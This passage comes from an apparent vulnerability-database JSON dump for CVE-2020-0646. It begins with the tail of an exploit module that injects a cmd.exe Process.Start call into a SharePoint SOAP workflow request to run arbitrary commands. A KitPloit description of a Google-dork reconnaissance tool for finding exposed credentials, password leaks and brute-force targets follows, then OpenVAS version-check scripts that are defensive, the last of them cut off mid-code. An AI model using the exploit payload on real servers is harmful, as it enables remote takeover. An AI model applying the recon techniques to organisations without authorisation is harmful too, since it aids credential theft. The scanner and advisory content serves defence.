execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\r\n end\r\n end\r\n\r\n def escape_command(cmd)\r\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\r\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] }\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n xoml_data = <<-EOS\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\r\n <workflowMarkupText>\r\n <![CDATA[\r\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\r\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\r\n </SequentialWorkflowActivity>\r\n ]]>\r\n </workflowMarkupText>\r\n <rulesText></rulesText>\r\n <configBlob></configBlob>\r\n <flag>2</flag>\r\n </ValidateWorkflowMarkupAndCreateSupportObjects>\r\n </soap:Body>\r\n</soap:Envelope>\r\n EOS\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => xoml_data,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n unless res&.code == 200\r\n print_error('Non-200 HTTP response received while trying to execute the command')\r\n end\r\n\r\n res\r\n end\r\nend\n\n# 0day.today [2020-03-26] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34152"}], "kitploit": [{"lastseen": "2021-01-19T09:37:39", "bulletinFamily": "tools", "cvelist": ["CVE-2020-0646"], "description": "[  ](<https://1.bp.blogspot.com/-1de0aBPNIWk/YAUWk6HkngI/AAAAAAAAVBA/s_ZSe7IlI7IkK-BtzxPMSmMHzAoV1_H6QCNcBGAsYHQ/s1200/BigBountyRecon_1.png>)\n\n \n\n\nBigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. Reconnaissance is the most important step in any [ penetration testing ](<https://www.kitploit.com/search/label/Penetration%20Testing> \"penetration testing\" ) or a bug hunting process. It provides an attacker with some preliminary knowledge on the target organisation. Furthermore, it will be useful to gain insights into what controls are in place as well as some rough estimations on the security maturity level of the target organisation. \n\nThis tool can be used in addition to your usual approach for bug hunting. The idea is to quickly check and gather information about your target organisation without investing time and remembering these syntaxes. In addition, it can help you define an approach towards finding some quick wins on the target. \n\nAny suggestions or ideas for this tool are welcome - just tweet me on [ @ManiarViral ](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n\n\n** Techniques ** \n\n\n 1. Directory Listing: Finding open directories using Google Dork on your target organisation helps one to understand the directory structure on the webserver. It may reveal [ sensitive information ](<https://www.kitploit.com/search/label/Sensitive%20Information> \"sensitive information\" ) or it may lead to information disclosure. \n\n 2. Configuration Files: Often times configuration files contains sensitive information such as hardcoded passwords, sensitive drive locations or API tokens which can help you gain privilege access to the internal resources. \n\n 3. Database Files: Database Files are data files that are used to store the contents of the database in a structured format into a file in separate tables and fields. Depending on the nature of the web application these files could provide access to sensitive information. \n\n 4. WordPress: WordPress is an open-source CMS written in PHP. WordPress has thousands of plugins to build, customise and enhance the websites. There are numerous [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) in these plugins. Finding WordPress related \n\n 5. Log Files: Log files sometimes provide detailed information of the users' activities in a particular application. These files are good to look at session cookies or other types of tokens. \n\n 6. Backup and Old Files: Backup files are original copies of the critical systems. These provide access to PII or access to sensitive records. \n\n 7. Login Pages: It is extremely important to identify login pages of your target organisation to perform bruteforce attempts or trying [ default credentials ](<https://www.kitploit.com/search/label/Default%20Credentials> \"default credentials\" ) to gain further access to organisation resources. \n\n 8. SQL Errors: SQL errors leaks sensitive information about the backend systems. This can help one to perform enumeration on the database types and see if the application is vulnerable to input validation related attacks such as SQL Injection. \n\n 9. Apache Config Files: Apache HTTP Server is configured by placing directives in plain text configuration files. The main configuration file is usually called httpd.conf. In addition, other configuration files may be added using the Include directive, and wildcards can be used to include many configuration files. Any directive may be placed in any of these configuration files. Depending on the entries in these config files it may reveal database connection strings, username and passwords, the internal workings, used and referenced libraries and business logic of application. \n\n 10. Robots.txt File: Robots.txt file instructs web robots how to crawl pages on their website. Depending on the content of the file, an attacker might discover hidden directories and files. \n\n 11. DomainEye: DomainEye is a domain/host investigation tool that has the largest domain databases. They provide services such as reverse Whois, reverse IP lookup, as well as reverse NS and MX. \n\n 12. Publicly Exposed Documents: Such documents can be used to extract metadata information. \n\n 13. phpinfo(): Exposing phpinfo() on its own isn't necessarily a risk, but in combination with other vulnerabilities could lead to your site becoming compromised. Additionally, module versions could make attackers life easier when targeting application using newly discovered exploits. \n\n 14. Finding Backdoors: This can help one to identify website defacements or server hijacking related issues. By exploiting the open redirect vulnerability on the trusted web application, the attacker can redirect victims to a phishing page. \n\n 15. Install/Setup Files: Such files allows an attacker to perform enumeration on the target organisation. Information gathered using these files can help discover version details which can then be used to perform the targeted exploit. \n\n 16. Open Redirects: With these, we look at various known parameters vulnerable to open redirect related issues. \n\n 17. Apache Struts RCE: Successfully exploiting an RCE vulnerability could allow the attacker to run arbitrary programs. Here, we are looking for files with extensions of \".action\" or \".do\". \n\n 18. 3rd Party Exposure: Here we are looking for exposure of information on third party sites such as Codebeautify, Codeshare and Codepen. \n\n 19. Check Security Headers: Identify quickly if the target site is using security related headers in the server response. \n\n 20. GitLab: Quickly look for sensitive information on the GitLab. \n\n 21. Find Pastebin Entries: Shows you the results related to the target organisation on the Pastebin site. This could be passwords or any other sensitive information related to the target organisation. \n\n 22. Employees on LINKEDIN: Identifying employee names on LinkedIn can help you build a username list when it comes to password spraying attack. \n\n 23. .HTACCESS / Sensitive Files: Look for sensitive file exposure. This may indicate a server misconfiguration. \n\n 24. Find Subdomains: Subdomain helps you expand the attack surface on the target organisation. There are numerous tools available to automate the process of subdomain enumeration. \n\n 25. Find Sub-Subdomains: Identify sub-sub domains on the target organisation using Google Dork, \n\n 26. Find WordPress related exposure: WordPress related exposure helps you gain access to sensitive files and folders. \n\n 27. BitBucket & Atlassian: Source code leakage, hardcoded credentials and access to cloud infrastructure. \n\n 28. PassiveTotal: PassiveTotal is a great tool to perform threat investigation. Using BigBountyRecon we will use PassiveTotal to identify subdomains on the target information. \n\n 29. Stackoverflow: Source code exposure or any technology-specific questions mentioned on the Stackoverflow. \n\n 30. Find WordPress related exposure using Wayback Machine: Look for archieved WordPress files using WaybackMachine. \n\n 31. GitHub: Quickly look for sensitive information on the GitHub. \n\n 32. OpenBugBounty: Look for publicly exposed security issues on the OpenBugBounty website. \n\n 33. Reddit: Information about the particular organisation on the Reddit platform. \n\n 34. Crossdomain.xml: Look for misconfigured crossdomain.xml files on the target organisation. \n\n 35. ThreatCrowd: Search engine for threats, however, we are going to use this to identify additional sub-domains. \n\n 36. .git Folder: Source code exposure. it's possible to download the entire repository content if accessible. \n\n 37. YouTube: Look for any recent news on Youtube. \n\n 38. Digitalocean Spaces: Spaces is an S3-compatible object storage service that lets you store and serve large amounts of data. We will look for any data exposures. \n\n 39. .SWF File (Google): Flash is dead. We are going to use Google Dorks to look for older versions of flash .swf's which contain vulnerabilities. \n\n 40. .SWF File (Yandex): Flash is dead. We are going to use Yandex to look for older versions of flash .swf's which contain vulnerabilities. \n\n 41. .SWF File (Wayback Machine): Flash is dead. We are going to use WaybackMachine to look for older versions of flash .swf's which contain vulnerabilities. \n\n 42. Wayback Machine: Look for archived files to access old files. \n\n 43. Reverse IP Lookup: Reverse IP Lookup lets you discover all the domain names hosted on any given IP address. This will help you to explore the attack surface for a target organisation. \n\n 44. Traefik: Look for an open-source Edge Router for an unauthenticated interface which exposes internal services. \n\n 45. Cloud Storage and Buckets: Google CSE for various cloud storages - aws, digitalocean, backblaze, wasabi, rackspace, dropbox, ibm, azure, dreamhost, linode, gcp, box, mailru \n\n 46. s3 Buckets: Open s3 buckets. \n\n 47. PublicWWW: Source code search engine indexes the content of over 200 million web sites and provides a query interface that lets the caller find any alphanumeric snippet, signature or keyword in the web pages \u2018HTML\u2019, \u2018JavaScript\u2019 and \u2018CSS\u2019 style sheet code. \n\n 48. Censys (IPv4, Domains & Certs): Search engine for finding internet devices. We will use this to look for additional sub-domains using various endpoints on Censys. \n\n 49. Shodan: Search engine for Internet-connected devices \n\n 50. SharePoint RCE: Look for CVE-2020-0646 SharePoint RCE related endpoint. \n\n 51. API Endpoints: Find WSDL files. \n\n 52. Gist Searches: Quickly look for sensitive information on the Gist pastes. \n\n 53. CT Logs: [ Certificate Transparency ](<https://www.kitploit.com/search/label/Certificate%20Transparency> \"Certificate Transparency\" ) (CT) is an Internet security standard and open-source framework for monitoring and auditing digital certificates. We will use to look for additional sub-domains for a targeted organisation. \n\n 54. Password Leak: Look for plaintext passwords of internal employees exposed in various leaks. \n\n 55. What CMS: Identify the version and type of CMS used by a target organisation for targeted enumeration and exploit research. \n\n \n** Screenshots ** \n\n\nSearch for plaintext passwords for a target organisation: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-a7bDrZPQamY/YAUWr80XooI/AAAAAAAAVBE/uxMttZ7hKTMMyMSAS_EHEeMjZHgMbeFawCNcBGAsYHQ/s1849/BigBountyRecon_2.png>)\n\n \n\n\nLooking for subdomains and other interesting information on the target organisation: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-dNYvaIk2FvU/YAUWwfzC2hI/AAAAAAAAVBI/_1VYpz-7eDkXb6ttrQxG6kA1eDHGUeJZACNcBGAsYHQ/s1687/BigBountyRecon_3.png>)\n\nFinding Apache Struts related assets: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-NP0ZVmNjuhc/YAUWziDsUZI/AAAAAAAAVBM/iL8sdo6Ymysr6Q0wO5AOmDIsTQoQvjIWACNcBGAsYHQ/s1610/BigBountyRecon_4.png>)\n\n \n\n\nVerifying if the URL contains extenstion of \".do\": \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-B96MKuKMQEI/YAUW2gPCWCI/AAAAAAAAVBU/J07KZmZOJOssCl7rNyZeyiOKQgWyaySDgCNcBGAsYHQ/s1633/BigBountyRecon_5.png>)\n\n \n\n\n** How to use this tool? ** \n\n\nStep1: Download the file from Release section: [ https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe ](<https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe> \"https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe\" )\n\nStep2: Run the EXE file \n\nStep3: Enter the target domain \n\nStep4: Click on different buttons in the tool to find information \n\nStep5: In case of Google Captcha simply click on the puzzle and move ahead \n\n \n** Questions? ** \n\n\nTwitter: [ https://twitter.com/maniarviral ](<https://twitter.com/maniarviral> \"https://twitter.com/maniarviral\" ) \nLinkedIn: [ https://au.linkedin.com/in/viralmaniar ](<https://au.linkedin.com/in/viralmaniar> \"https://au.linkedin.com/in/viralmaniar\" )\n\n \n** Dorking operators across Google, DuckDuckGo, Yahoo and Bing ** \n\n\nTable obtained from: [ https://exposingtheinvisible.org/guides/google-dorking/ ](<https://exposingtheinvisible.org/guides/google-dorking/> \"https://exposingtheinvisible.org/guides/google-dorking/\" )\n\nHere is a table with possible dorks for various search engines. \n\nDork | Description | Google | DuckDuckGo | Yahoo | Bing \n---|---|---|---|---|--- \ncache:[url] | Shows the version of the web page from the search engine\u2019s cache. | \u2713 | | | \nrelated:[url] | Finds web pages that are similar to the specified web page. | \u2713 | | | \ninfo:[url] | Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page. | \u2713 | | | \nsite:[url] | Finds pages only within a particular domain and all its subdomains. | \u2713 | \u2713 | \u2713 | \u2713 \nintitle:[text] or allintitle:[text] | Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing. | \u2713 | \u2713 | \u2713 | \u2713 \nallinurl:[text] | Finds pages that include a specific keyword as part of their indexed URLs. | | \u2713 | | \nmeta:[text] | Finds pages that contain the specific keyword in the meta tags. | | | | \nfiletype:[file extension] | Searches for specific file types. | \u2713 | \u2713 | | \u2713 \nintext:[text], allintext:[text], inbody:[text] | Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used. | \u2713 | \u2713 | | \u2713 \ninanchor:[text] | Search link anchor text | \u2713 | | | \nlocation:[iso code] or loc:[iso code], region:[region code] | Search for specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code].An iso location code is a short code for a country for example, Egypt is eg and USA is us. [ https://en.wikipedia.org/wiki/ISO_3166-1 ](<https://en.wikipedia.org/wiki/ISO_3166-1> \"https://en.wikipedia.org/wiki/ISO_3166-1\" ) | | \u2713 | | \u2713 \ncontains:[text] | Identifies sites that contain links to filetypes specified (i.e. contains:pdf) | | | | \u2713 \naltloc:[iso code] | Searches for location in addition to one specified by language of site (i.e. pt-us or en-us) | | | | \u2713 \nfeed:[feed type, i.e. rss] | Find RSS feed related to search term | | \u2713 | \u2713 | \u2713 \nhasfeed:[url] | Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds. | \u2713 | \u2713 | | \u2713 \nip:[ip address] | Find sites hosted by a specific ip address | | | \u2713 | \u2713 \nlanguage:[language code] | Returns websites that match the search term in a specified language | | \u2713 | \u2713 | \nbook:[title] | Searches for book titles related to keywords | \u2713 | | | \nmaps:[location] | Searches for maps related to keywords | \u2713 | | | \nlinkfromdomain:[url] | Shows websites whose links are mentioned in the specified url (with errors) | | | | \u2713 \n \n** Contribution **\n\nAny suggestions or ideas for this tool are welcome - just tweet me on [ @ManiarViral ](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n \n\n\n** [ Download BigBountyRecon ](<https://github.com/Viralmaniar/BigBountyRecon> \"Download BigBountyRecon\" ) **\n", "edition": 1, "modified": "2021-01-18T20:30:02", "published": "2021-01-18T20:30:02", "id": "KITPLOIT:4480301396595295532", "href": "http://www.kitploit.com/2021/01/bigbountyrecon-this-tool-utilises-58.html", "title": "BigBountyRecon - This Tool Utilises 58 Different Techniques To Expediate The Process Of Intial Reconnaissance On The Target Organisation", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-05T15:41:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing an important security\n update according to Microsoft KB4535101", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815898", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815898", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535101", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815898\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535101\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4535101\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.7.2 and 4.8 on Microsoft Windows 10 version 1809 and Microsoft Windows Server 2019.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535101\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17763\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4535101\n ## https://support.microsoft.com/en-us/help/4532947\n ## https://support.microsoft.com/en-us/help/4532937\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9042\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9042\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4535101\n ## https://support.microsoft.com/en-us/help/4532947\n ## https://support.microsoft.com/en-us/help/4532937\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9042\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9042\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4535104", "modified": "2020-06-04T00:00:00", "published": "2020-01-16T00:00:00", "id": "OPENVAS:1361412562310816553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816553", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535104)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816553\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-16 11:32:54 +0530 (Thu, 16 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535104)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4535104\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535104\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532946\n ## https://support.microsoft.com/en-us/help/4532927\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532946\n ## https://support.microsoft.com/en-us/help/4532927\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && 